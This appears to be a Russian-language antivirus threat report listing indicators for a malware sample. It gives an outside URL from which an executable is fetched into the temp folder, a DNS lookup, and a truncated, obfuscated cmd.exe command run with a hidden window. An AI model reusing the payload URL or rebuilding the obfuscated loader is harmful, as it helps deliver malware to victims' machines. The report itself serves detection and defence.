Техническая информация
- https://casana-ae.com/hok.exe как %temp%\hok.exe
- '<SYSTEM32>\cmd.exe' /v:ON /c"set initi= && set x=jMr%/SyhCn-)Dt'Bse2ENP:,Hp\KwkuaF6l;Ti.(c dboxWm && for %H in (25,44,28,17,2,16,7,17,34,34,41,10,28,41,24,37,42,42,17,9,41,10,19,45,17,40,30,13,37,44,9,21,44,34,37,...
- DNS ASK ca###a-ae.com
- '<SYSTEM32>\cmd.exe' /v:ON /c"set initi= && set x=jMr%/SyhCn-)Dt'Bse2ENP:,Hp\KwkuaF6l;Ti.(c dboxWm && for %H in (25,44,28,17,2,16,7,17,34,34,41,10,28,41,24,37,42,42,17,9,41,10,19,45,17,40,30,13,37,44,9,21,44,34,37,...' (со скрытым окном)